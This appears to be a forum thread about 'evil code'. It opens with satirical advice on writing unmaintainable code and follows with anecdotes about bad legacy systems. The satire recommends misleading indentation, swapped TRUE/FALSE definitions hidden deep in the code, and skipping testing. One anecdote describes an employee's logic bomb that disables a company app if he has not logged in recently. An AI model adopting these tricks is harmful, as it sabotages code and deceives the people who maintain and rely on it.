Never use an automated source code tidier (beautifier) to keep your code aligned. Lobby to have them banned them from your company on the grounds they create false deltas in PVCS/CVS (version control tracking) or that every programmer should have his own indenting style held forever sacrosanct for any module he wrote. Insist that other programmers observe those idiosyncratic conventions in "his " modules. Banning beautifiers is quite easy, even though they save the millions of keystrokes doing manual alignment and days wasted misinterpreting poorly aligned code. Just insist that everyone use the same tidied format, not just for storing in the common repository, but also while they are editing. This starts an RWAR and the boss, to keep the peace, will ban automated tidying. Without automated tidying, you are now free to accidentally misalign the code to give the optical illusion that bodies of loops and ifs are longer or shorter than they really are, or that else clauses match a different if than they really do. e.g.
if(a)
if(b) x=y;
else x=z;
Testing is for cowards
A brave coder will bypass that step. Too many programmers are afraid of their boss, afraid of losing their job, afraid of customer hate mail and afraid of being sued. This fear paralyzes action, and reduces productivity. Studies have shown that eliminating the test phase means that managers can set ship dates well in advance, an obvious aid in the planning process. With fear gone, innovation and experimentation can blossom. The role of the programmer is to produce code, and debugging can be done by a cooperative effort on the part of the help desk and the legacy maintenance group.
If we have full confidence in our coding ability, then testing will be unnecessary. If we look at this logically, then any fool can recognise that testing does not even attempt to solve a technical problem, rather, this is a problem of emotional confidence. A more efficient solution to this lack of confidence issue is to eliminate testing completely and send our programmers to self-esteem courses. After all, if we choose to do testing, then we have to test every program change, but we only need to send the programmers to one course on building self-esteem. The cost benefit is as amazing as it is obvious.
Reverse the Usual True False Convention
Reverse the usual definitions of true and false. Sounds very obvious but it works great. You can hide:
#define TRUE 0
#define FALSE 1
somewhere deep in the code so that it is dredged up from the bowels of the program from some file that noone ever looks at anymore. Then force the program to do comparisons like:
if ( var == TRUE )
if ( var != FALSE )
someone is bound to "correct" the apparent redundancy, and use var elsewhere in the usual way:
if ( var )
Another technique is to make TRUE and FALSE have the same value, though most would consider that out and out cheating. Using values 1 and 2 or -1 and 0 is a more subtle way to trip people up and still look respectable. You can use this same technique in Java by defining a static constant called TRUE. Programmers might be more suspicious you are up to no good since there is a built-in literal true in Java.
Exploit Schizophrenia
Java is schizophrenic about array declarations. You can do them the old C, way String x[], (which uses mixed pre-postfix notation) or the new way String[] x, which uses pure prefix notation. If you want to really confuse people, mix the notationse.g.
byte[ ] rowvector, colvector , matrix[ ];
which is equivalent to:
byte[ ] rowvector;
byte[ ] colvector;
byte[ ][] matrix;
I don't know if I'd call the code "evil", but we had a developer who would create Object[] arrays instead of writing classes. Everywhere.
I have seen (and posted to thedailywtf) code that will give everyone to have administrator rights in significant part of an application on Tuesdays. I guess the original developer forgot to remove the code after local machine testing.
I don't know if this is "evil" so much as misguided (I recently posted it on The Old New Thing):
I knew one guy who loved to store information as delimited strings. He was familiar with the concept of arrays, as shown when he used arrays of delimited strings, but the light bulb never lit up.
Base 36 encoding to store ints in strings.
I guess the theory goes somewhat along the lines of:
Hexadecimal is used to represent numbers
Hexadecimal doesnt use letters beyond F, meaning G-Z are wasted
Waste is bad
At this moment I am working with a database that is storing the days of the week that an event can happen on as a 7-bit bitfield (0-127), stored in the database as a 2-character string ranging from '0' to '3J'.
I remember seeing a login handler that took a post request, and redirected to a GET with the user name and password passed in as parameters. This was for an "enterprise class" medical system.
I noticed this while checking some logs - I was very tempted to send the CEO his password.
Really evil was this piece of brilliant delphi code:
type
TMyClass = class
private
FField : Integer;
public
procedure DoSomething;
end;
var
myclass : TMyClass;
procedure TMyClass.DoSomething;
begin
myclass.FField := xxx; //
end;
It worked great if there was only one instance of a class. But unfortunately I had to use an other instance and that created lots of interesting bugs.
When I found this jewel, I can't remember if I fainted or screamed, probably both.
Maybe not evil, but certainly rather, um... misguided.
I once had to rewrite a "natural language parser" that was implemented as a single 5,000 line if...then statement.
as in...
if (text == "hello" || text == "hi")
response = "hello";
else if (text == "goodbye")
response = "bye";
else
...
I saw code in an ASP.NET MVC site from a guy who had only done web forms before (and is a renowned copy/paster!) that stuck a client side click event on an <a> tag that called a javascript method that did a document.location.
I tried to explain that a href on the <a> tag would do the same!!!
A little evil...someone I know wrote into the main internal company web app, a daily check to see if he has logged into the system in the past 10 days. If there's no record of him logged in, it disables the app for everyone in the company.
He wrote the piece once he heard rumors of layoffs, and if he was going down, the company would have to suffer.
The only reason I knew about it, is that he took a 2 week vacation & I called him when the site crapped out. He told me to log on with his username/password...and all was fine again.
Of course..months later we all got laid off.
My colleague likes to recall that ASP.NET application which used a public static database connection for all database work.
Yes, one connection for all requests. And no, there was no locking done either.
I remember having to setup IIS 3 to run Perl CGI scripts (yes, that was a looong time ago). The official recommendation at that time was to put Perl.exe in cgi-bin. It worked, but it also gave everyone access to a pretty powerful scripting engine!
Any RFC 3514-compliant program which sets the evil bit.
SQL queries right there in javascript in an ASP application. Can't get any dirtier...
We had an application that loaded all of it's global state in an xml file. No problem with that, except that the developer had created a new form of recursion.
<settings>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
Then comes the fun part. When the application loads, it runs through the list of properties and adds them to a global (flat) list, along with incrementing a mystery counter. The mystery counter is named something totally irrelevant and is used in mystery calculations:
List properties = new List();
Node<-root
while node.hasNode("property")
add to properties list
my_global_variable++;
if hasNode("property")
node=getNode("property"), ... etc etc
And then you get functions like
calculateSumOfCombinations(int x, int y){
return x+y+my_global_variable;
}
edit: clarification - Took me a long time to figure out that he was counting the depth of the recursion, because at level 6 or 7 the properties changed meaning, so he was using the counter to split his flat set into 2 sets of different types, kind of like having a list of STATE, STATE, STATE, CITY, CITY, CITY and checking if the index > counter to see if your name is a city or state)
Instead of writing a Windows service for a server process that needed to run constantly one of our "architects" wrote a console app and used the task scheduler to run it every 60 seconds.
Keep in mind this is in .NET where services are very easy to create.
--
Also, at the same place a console app was used to host a .NET remoting service, so they had to start the console app and lock a session to keep it running every time the server was rebooted.
--
At the last place I worked one of the architects had a single C# source code file with over 100 classes that was something like 250K in size.
32 source code files with more then 10K lines of code each. Each contained one class. Each class contained one method that did "everything"
That was real nightmare for debuging that code before I had to refactor that.
At an earlier workplace, we inherited a legacy project, which partially had been outsorced earlier. The main app was Java, the outsourced part was a native C library. Once I had a look at the C source files. I listed the contents of the directory. There were several source files over 200K in size. The biggest C file was 600 Kbytes.
Thank God I never had to actually touch them :-)
I was given a set of programs to advance while colleagues were abroad at a customer (installing said programs). One key library came up in every program, and trying to figure out the code, I realised that there were tiny differences from one program to the next. In a common library.
Realising this, I ran a text comparison of all copies. Out of 16, I think there were about 9 unique ones. I threw a bit of a fit.
The boss intervened and had the colleagues collate a version that was seemingly universal. They sent the code by e-mail. Unknown to me, there were strings with unprintable characters in there, and some mixed encodings. The e-mail garbled it pretty bad.
The unprintable characters were used to send out data (all strings!) from a server to a client. All strings were thus separated by the 0x03 character on the server-side, and re-assembled client-side in C# using the Split function.
The somwehat sane way would have been to do:
someVariable.Split(Convert.ToChar(0x03);
The saner and friendly way would have been to use a constant:
private const char StringSeparator = (char)0x03;
//...
someVariable.Split(StringSeparator);
The EVIL way was what my colleagues chose: use whatever "prints" for 0x03 in Visual Studio and put that between quotes:
someVariable.Split('/*unprintable character*/');
Furthermore, in this library (and all the related programs), not a single variable was local (I checked!). Functions were designed to either recuperate the same variables once it was deemed safe to waste them, or to create new ones which would live on for all the duration of the process. I printed out several pages and colour coded them. Yellow meant "global, never changed by another function", Red meant "global, changed by several". Green would have been "local", but there was none.
Oh, did I mention control version? Because of course there was none.
ADD ON: I just remembered a function I discovered, not long ago.
Its purpose was to go through an array of arrays of intergers, and set each first and last item to 0. It went like this (not actual code, from memory, and more C#-esque):
FixAllArrays()
{
for (int idx = 0; idx < arrays.count- 1; idx++)
{
currArray = arrays[idx];
nextArray = arrays[idx+1];
SetFirstToZero(currArray);
SetLastToZero(nextArray);
//This is where the fun starts
if (idx == 0)
{
SetLastToZero(currArray);
}
if (idx == arrays.count- 1)
{
SetFirstToZero(nextArray);
}
}
}
Of course, the point was that every sub-array had to get this done, both operations, on all items. I'm just not sure how a programmer can decide on something like this.
Similar to what someone else mentioned above:
I worked in a place that had a pseudo-scripting language in the application. It fed into a massive method that had some 30 parameters and a giant Select Case statement.
It was time to add more parameters, but the guy on the team who had to do it realized that there were too many already.
His solution?
He added a single object parameter on the end, so he could pass in anything he wanted and then cast it.
I couldn't get out of that place fast enough.
Once after our client teams reported some weird problems, we noticed that two different versions of the application was pointing to the same database. (while deploying the new system to them, their database was upgraded, but everyone forgot to bring down their old system)
This was a miracle escape..
And since then, we have an automated build and deploy process, thankfully :-)
I think that it was a program which loaded a loop into the general purpose registers of a pdp-10 and then executed the code in those registers.
You could do that on a pdp-10. That doesn't mean that you should.
EDIT: at least this is to the best of my (sometimes quite shabby) recollection.
I had the deep misfortune of being involved in finding a rather insane behavior in a semi-custom database high-availability solution.
The core bits were unremarkable. Red Hat Enterprise Linux, MySQL, DRBD, and the Linux-HA stuff. The configuration, however, was maintained by a completely custom puppet-like system (unsurprisingly, there are many other examples of insanity resulting from this system).
It turns out that the system was checking the install.log file that Kickstart leaves in the root directory for part of the information it needed to create the DRBD configuration. This in itself is evil, of course. You don't pull configuration from a log file whose format is not actually defined. It gets worse, though.
It didn't store this data anywhere else, and every time it ran, which was every 60 seconds, it consulted install.log.
I'll just let you guess what happened the first time somebody decided to delete this otherwise useless log file.